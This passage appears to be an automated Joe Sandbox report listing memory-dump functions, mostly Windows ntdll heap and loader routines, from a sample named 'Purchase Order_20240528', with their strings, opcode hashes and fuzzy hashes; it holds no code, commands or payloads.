                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  • API String ID: 0-617086771
                                  • Opcode ID: 2773bb19f68e245129a61d9145ac1639d103548a8d5ec7ce7e1c3f30de08ecfc
                                  • Instruction ID: c403dbba91cff78344529df8817e0554954d9b68c93061d4e3555cc269a02158
                                  • Opcode Fuzzy Hash: 2773bb19f68e245129a61d9145ac1639d103548a8d5ec7ce7e1c3f30de08ecfc
                                  • Instruction Fuzzy Hash: 40929B71A042499FEB25CF68C844BAEBBF1FF48300F18849DEA55AB391D735A945CF50
                                  Function 01606962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $@
                                  • API String ID: 0-1077428164
                                  • Opcode ID: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                  • Instruction ID: b920c96a94633471f20768df0be891e45b44659a4a25725bbfb521743f527968
                                  • Opcode Fuzzy Hash: ecc4139566633821532ad27c4451ac5b08eda8dad24060b7e442fee1357f7e78
                                  • Instruction Fuzzy Hash: BEC27F716093519FE72ACF28CC40BABBBE5AF88754F05892DE9C987381D734E845CB52
                                  Function 015DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  • API String ID: 0-2779062949
                                  • Opcode ID: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                  • Instruction ID: 1c741fe87d74e4ad9ed4cd62adb67c756052da2fb77a5ae0c14ce7abc6d9635d
                                  • Opcode Fuzzy Hash: 3afd008a22c5fbc6584d1b0a79f4f45359c1ff049a43ee9768bd03989325de23
                                  • Instruction Fuzzy Hash: F4A18F719116299BDB31DF28CC88BEAB7B8FF44710F1001EAE909A7251E7359E84CF54
                                  Function 015F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                  • Instruction ID: 3c2c7769393656a0f69a9832897860708d1c70ca49ecf12fc0812f3555d319ff
                                  • Opcode Fuzzy Hash: 1defb1d777b265b940bd7086c2c91b963295e239a6a9609f6fe06660bbf123dc
                                  • Instruction Fuzzy Hash: 5861B270600346DFDB29DF28C880B6ABBE2FF45704F18855DE59A8F296D770E881CB91
                                  Function 0169C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                  Download Yara Rule
                                  Strings
                                  • PreferredUILanguages, xrefs: 0169C212
                                  • @, xrefs: 0169C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0169C1C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  • API String ID: 0-2968386058
                                  • Opcode ID: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                  • Instruction ID: 19217f2aa71fb92fe1f2e7b44072de2221966e8ff4fe4fc5a50828ebd235197c
                                  • Opcode Fuzzy Hash: a0782d5b13be4c930e6a9ff18483f136d8b49ee825d76376810693e5169489f7
                                  • Instruction Fuzzy Hash: C3416271E0021AABDF11DBD8CC91BEEBBBDAB55704F1480AAE605A7280D7749A45CB50
                                  Function 01674144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  • API String ID: 0-1373925480
                                  • Opcode ID: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                  • Instruction ID: ae0f8125a869d6e12aafd7f5d587b22727661f617763eac4ae6e3dc12d011a9b
                                  • Opcode Fuzzy Hash: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                  • Instruction Fuzzy Hash: 99410231A006498FEB26DBD9DC48BADBBB9FF95340F14045ADA11EF791DB358901CB10
                                  Function 015F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                  • Instruction ID: edec4bd886d69d717e68050bf911d0c08b41dd24faff41bc7178fd3516b5807f
                                  • Opcode Fuzzy Hash: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                  • Instruction Fuzzy Hash: 5411CD313161469FDB29DB18C880B6AB3A6BF41716F18811EF506CF292DB34D841C755
                                  Function 016620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                  Download Yara Rule
                                  Strings
                                  • Process initialization failed with status 0x%08lx, xrefs: 016620F3
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01662104
                                  • LdrpInitializationFailure, xrefs: 016620FA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 0-2986994758
                                  • Opcode ID: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                  • Instruction ID: d9082f9d4f9c2188f169eb67b4e6f25619514b0ed4b71c8f4e23aefca54c6ea5
                                  • Opcode Fuzzy Hash: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                  • Instruction Fuzzy Hash: BBF02274A40708AFE724EA8CCC56FAA776DFB40B04F10002CFB007B781D3B0A950CA85
                                  Function 015F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  • API String ID: 48624451-232158463
                                  • Opcode ID: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                  • Instruction ID: 7bd550ca02dab0cc54ba21c4ad67ac2d668612d22a00aee80e8b1aa4a079c537
                                  • Opcode Fuzzy Hash: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                  • Instruction Fuzzy Hash: A1713B71A0014A9FDB01DFA8CD95BAEB7F9BF48744F144069EA05EB291EB34ED01CB64
                                  Function 0166892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0166895E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  • API String ID: 0-702105204
                                  • Opcode ID: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                  • Instruction ID: 390a3da6c22c826e811ae8f2090ce64c312b418078e1697920118b828a05dd09
                                  • Opcode Fuzzy Hash: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                  • Instruction Fuzzy Hash: CB01F731A11302AFE7345F7DCC84A567B6DFFD5695B04121CF64207651CB606845C796
                                  Function 015EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                  Download Yara Rule
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 015EAA25
                                  • LdrResSearchResource Enter, xrefs: 015EAA13
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  • API String ID: 0-4066393604
                                  • Opcode ID: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                  • Instruction ID: b7e6b71722a7ba112a3138e17513a0d6fb45970f523017c4f68417e1c90aa102
                                  • Opcode Fuzzy Hash: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                  • Instruction Fuzzy Hash: ECE17071E002199BEF268FA9DD88BAEBBF9BF54310F104529F901EB351D7749941CB50
                                  Function 016AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction ID: a698c2c5862afa5a4a5d6c68120d0806c8aee6c4c55a1dfe6510da5f284cc184
                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                  • Instruction Fuzzy Hash: 7EC1BE312043429BE725CF68CC41B6BBBE6AFC4318F484A2EF6968B291D774D905CF55
                                  Function 0165E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                  • Instruction ID: fab33ac51e98d38f9c8150a5bc9c232732f845c3be453a0f92c2bf6239fbf219
                                  • Opcode Fuzzy Hash: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                  • Instruction Fuzzy Hash: 45616C72E006199FDF54DFA88D80BADFBB5FB48700F15406EEA49EB241D732AA00CB50
                                  Function 016843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  • API String ID: 0-17815947
                                  • Opcode ID: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                  • Instruction ID: 5d3890d03d3bf9ab7bfa470e6e4366a162db0a8575b38d4b5b8aec26540c485f
                                  • Opcode Fuzzy Hash: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                  • Instruction Fuzzy Hash: B051F771E4061EAEDF11DFA9CC90BEEBBB9FB58754F100629E611B7290DB309905CB60
                                  Function 015EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                  Download Yara Rule
                                  Strings
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 015EA2FB
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 015EA309
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  • API String ID: 0-2876891731
                                  • Opcode ID: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                  • Instruction ID: 588feb8dce0be5d4cfe5c92a5275bf9e022bae34ccc90e30ce76bb6ee31257d4
                                  • Opcode Fuzzy Hash: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                  • Instruction Fuzzy Hash: 07419930A00646DBEB19CF69D894B6ABBF4BF88304F2444A9E914DF391E3B5D900CB50
                                  Function 0161A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  • API String ID: 2994545307-4008356553
                                  • Opcode ID: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                  • Instruction ID: 28a8472b74ada99cd9dafe54866eed19cf896df9be8f522fead069b3a40b4dd5
                                  • Opcode Fuzzy Hash: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                  • Instruction Fuzzy Hash: A70121B2215780AFD311CF54CD45B1677E8E784725F08883DE608CB180E370E800CB8A
                                  Function 015EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  • API String ID: 0-1339004836
                                  • Opcode ID: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                  • Instruction ID: ea8d2245197a0a4b8cb89f8cda163a957709eb4a2c61efeabba538fc318dbc9e
                                  • Opcode Fuzzy Hash: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                  • Instruction Fuzzy Hash: 12826975E002198FEB29CFA9C988BEDBBF5BF48310F148169E919AF390D7709941CB50
                                  Function 0168A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                  • Instruction ID: e026c2fc2e2c7d5dc1a3bea71a7f3f58011435476769fe6eb5832c7af19df7df
                                  • Opcode Fuzzy Hash: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                  • Instruction Fuzzy Hash: EA22C1742046618BEB25EFADC850372BBF1AF44304F08865BDD868F386E775E492DB61
                                  Function 015E6A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                  • Instruction ID: 28eae9194aed1cef20b39661661fc30a0505afd59166cad6acac8faff8ab260a
                                  • Opcode Fuzzy Hash: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                  • Instruction Fuzzy Hash: E4328C71E01215CFDB29CF68C884AAEBBF2FF58310F148569E956AB391D774E881CB50
                                  Function 015E65D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                  • Instruction ID: 184456b348ba0b160812e0ab5eceab0431070bfcef96f18cc16644fc1a3e091c
                                  • Opcode Fuzzy Hash: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                  • Instruction Fuzzy Hash: B6E1C071A08342CFC719CF28C494A6ABBE0FF99354F05896DE9958B351DB30E905CF92
                                  Function 0160E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5153b0f7c99bd00b6239c7c38beeaa363064033a56430acb5350c61283cc9c97
                                  • Instruction ID: 94b184fa515e8f51d906e6971f1d4b4c07852b74500f798feaa8b4b110a7135d
                                  • Opcode Fuzzy Hash: 5153b0f7c99bd00b6239c7c38beeaa363064033a56430acb5350c61283cc9c97
                                  • Instruction Fuzzy Hash: B2A13331E006299FEB26DBACCC44BAFBBB5BB01714F0505A9EA00AB3D1C7749D41CB95
                                  Function 0160EBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2db95a44b6f1be1f5690de5931ac3fa0c71ad4f57e3891095053471a9e849a7
                                  • Instruction ID: 5c420b16053c4e32ad4ed42d872bcef89e73f1c82405515896d7da58a8f30e75
                                  • Opcode Fuzzy Hash: c2db95a44b6f1be1f5690de5931ac3fa0c71ad4f57e3891095053471a9e849a7
                                  • Instruction Fuzzy Hash: 8E41A2B26043129FD729DF28CC84A17B7E5FF88214F004C6DE6A6C7791DB72E8458B51
                                  Function 015E262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmpDownload File
